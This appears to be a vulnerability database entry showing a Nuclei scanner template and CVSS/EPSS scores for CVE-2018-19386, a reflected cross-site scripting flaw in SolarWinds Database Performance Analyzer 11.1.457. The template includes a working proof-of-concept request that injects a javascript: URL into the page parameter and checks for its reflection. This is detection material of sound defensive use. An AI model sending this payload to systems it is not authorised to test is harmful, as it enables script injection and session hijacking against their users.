ProjectDiscoveryNUCLEI:CVE-2018-19386SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting
4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.002 Low
EPSS
Percentile
55.1%
SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the ‘Try Again’ Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
id: CVE-2018-19386
info:
name: SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or defacement of the affected application.
remediation: |
Apply the latest patch or upgrade to a non-vulnerable version of SolarWinds Database Performance Analyzer.
reference:
- https://i.imgur.com/Y7t2AD6.png
- https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5
- https://nvd.nist.gov/vuln/detail/CVE-2018-19386
- https://github.com/Elsfa7-110/kenzer-templates
- https://github.com/merlinepedra/nuclei-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-19386
cwe-id: CWE-79
epss-score: 0.00177
epss-percentile: 0.54797
cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: solarwinds
product: database_performance_analyzer
tags: cve,cve2018,solarwinds,xss
http:
- method: GET
path:
- "{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"
matchers-condition: and
matchers:
- type: word
words:
- '<a href="javascript:alert(document.domain)//'
- type: status
status:
- 200
# digest: 4a0a00473045022100d7e6ee6c4a5dacc72f204038317f3d576080fb833cb02aab58fb9a32ac0339ed0220684eb3d85d15b9ecff6fc2978c4574372dc3adf26c14c12edff24287e95f6c0e:922c64590222798bb761d5b6d8e72950Related
4.3 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.002 Low
EPSS
Percentile
55.1%